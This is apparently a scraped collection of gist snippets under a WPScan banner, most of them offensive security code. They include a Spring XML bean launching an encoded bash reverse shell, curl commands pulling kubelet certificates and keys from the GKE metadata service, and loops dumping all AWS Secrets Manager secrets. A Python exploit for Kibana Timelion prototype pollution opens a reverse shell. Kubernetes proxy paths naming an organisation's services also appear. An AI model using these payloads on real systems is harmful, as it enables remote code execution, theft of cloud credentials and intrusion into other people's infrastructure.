_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8" ?> | |
<beans xmlns="http://www.springframework.org/schema/beans" | |
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> | |
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> | |
<constructor-arg> | |
<list> | |
<value>bash</value> | |
<value>-c</value> | |
<value><![CDATA[echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTMwLzQ0NDQgMD4mMQ== | base64 -d | bash]]></value> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_CERT | awk '{print $2}' | base64 -d > kubelet.crt | |
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_KEY | awk '{print $2}' | base64 -d > kubelet.key | |
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/api/v1/namespaces/absdataservice/services/uat-absdataservice:http/proxy | |
/api/v1/namespaces/absdataservice/services/uat-absdataservice:https/proxy | |
/api/v1/namespaces/admin/services/prometheus-alertmanager:http/proxy | |
/api/v1/namespaces/admin/services/prometheus-blackbox-exporter:http/proxy | |
/api/v1/namespaces/admin/services/prometheus-kube-state-metrics:http/proxy | |
/api/v1/namespaces/admin/services/prometheus-pushgateway:http/proxy | |
/api/v1/namespaces/admin/services/prometheus-server:http/proxy | |
/api/v1/namespaces/admin/services/traefik:http/proxy | |
/api/v1/namespaces/admin/services/traefik:https/proxy | |
/api/v1/namespaces/ango-demo/services/ango-admin:http/proxy |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
for sec in `aws secretsmanager list-secrets | jq -r '.SecretList[].Name'`; do | |
aws secretsmanager get-secret-value --secret-id $sec | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
for env in `aws elasticbeanstalk describe-environments | jq -r '.Environments[].EnvironmentName'`; do | |
aws elasticbeanstalk retrieve-environment-info --environment-name $env --info-type tail | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
for picture in *.webp ; do | |
new=$(echo $picture | sed 's/\.[^.]*$//') | |
dwebp $picture -o $new.png | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
session = requests.Session() | |
cmd = "bash -i >& /dev/tcp/192.168.0.136/12345 0>&1" | |
rawBody = "{\"sheet\":[\".es(*).props(label.__proto__.env.AAAA='require(\\\"child_process\\\").exec(\\\""+cmd+"\\\");process.exit()//')\\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')\"],\"time\":{\"from\":\"now-15m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Europe/London\"}}" | |
headers = {"Origin":""+KIB_URL+"","Accept":"application/json, text/plain, */*","kbn-version":"6.7.0","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":""+KIB_URL+"/_plugin/kibana/app/timelion","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/json;charset=utf-8"} | |
response = session.post(""+KIB_URL+"/_plugin/kibana/api/timelion/run", data=rawBody, headers=headers) | |
print("Status code: %i" % response.status_code) |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
20-ev-allgemein | |
20-years | |
200 | |
2000 | |
20000719 | |
2001 | |
2001cc | |
2002 | |
2003 | |
2004 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
for job in `cat $1`; do | |
curl -XPOST https://api.binaryedge.io/v1/tasks/$job/revoke -H 'X-Token:YOURBINARYEDGETOKEN' | |
done |